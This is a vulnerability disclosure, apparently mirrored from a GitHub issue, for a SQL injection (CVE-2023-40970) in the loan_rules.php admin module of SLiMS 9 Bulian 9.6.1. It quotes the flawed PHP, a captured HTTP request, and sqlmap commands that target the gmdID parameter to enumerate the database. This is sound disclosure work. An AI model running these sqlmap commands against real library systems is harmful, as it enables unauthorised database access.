Headline

CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.

1 year ago

CVE

Open in Source

#sql #csrf #web #mac #apple #google #java #intel #php #chrome #webkit

The bug

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/* RECORD OPERATION */ if (isset($_POST[‘saveData’])) { $data[‘member_type_id’] = $_POST[‘memberTypeID’]; $data[‘coll_type_id’] = $_POST[‘collTypeID’]; $data[‘gmd_id’] = $_POST[‘gmdID’]; $data[‘loan_limit’] = trim($_POST[‘loanLimit’]); $data[‘loan_periode’] = trim($_POST[‘loanPeriode’]); $data[‘reborrow_limit’] = trim($_POST[‘reborrowLimit’]); $data[‘fine_each_day’] = trim($_POST[‘fineEachDay’]); $data[‘grace_periode’] = trim($_POST[‘gracePeriode’]); $data[‘input_date’] = date(‘Y-m-d’); $data[‘last_update’] = date(‘Y-m-d’); // create sql op object $sql_op = new simbio_dbop($dbs); if (isset($_POST[‘updateRecordID’])) { /* UPDATE RECORD MODE */ // remove input date unset($data[‘input_date’]); // filter update record ID $updateRecordID = (integer)$_POST[‘updateRecordID’]; // update the data $update = $sql_op->update('mst_loan_rules’, $data, 'loan_rules_id=’.$updateRecordID); if ($update) { toastr(__(‘Loan Rules Successfully Updated’))->success(); echo ‘<script language="Javascript">parent.jQuery(\’#mainContent\’).simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>’; } else { toastr(__(‘Loan Rules FAILED to Updated. Please Contact System Administrator’)."\nDEBUG : ".$sql_op->error)->error(); } exit(); } else { /* INSERT RECORD MODE */ $insert = $sql_op->insert(‘mst_loan_rules’, $data); // BUG HERE if ($insert) { toastr(__(‘New Loan Rules Successfully Saved’))->success(); echo ‘<script language="Javascript">parent.jQuery(\’#mainContent\’).simbioAJAX(\’’.$_SERVER[‘PHP_SELF’].’\’);</script>’; } else { toastr(__(‘Loan Rules FAILED to Save. Please Contact System Administrator’)."\n".$sql_op->error)->error(); } exit(); } exit(); }

To Reproduce

Steps to reproduce the behavior:

Login as admin or user that has access to circulation
make sure burp suit is on to capture the request such as below:

save the request into a file (example.req)
run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql
voila

example.req

POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close

------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"

98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"

0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"

Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--

Screenshots****proof-of-concept current database

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db

versions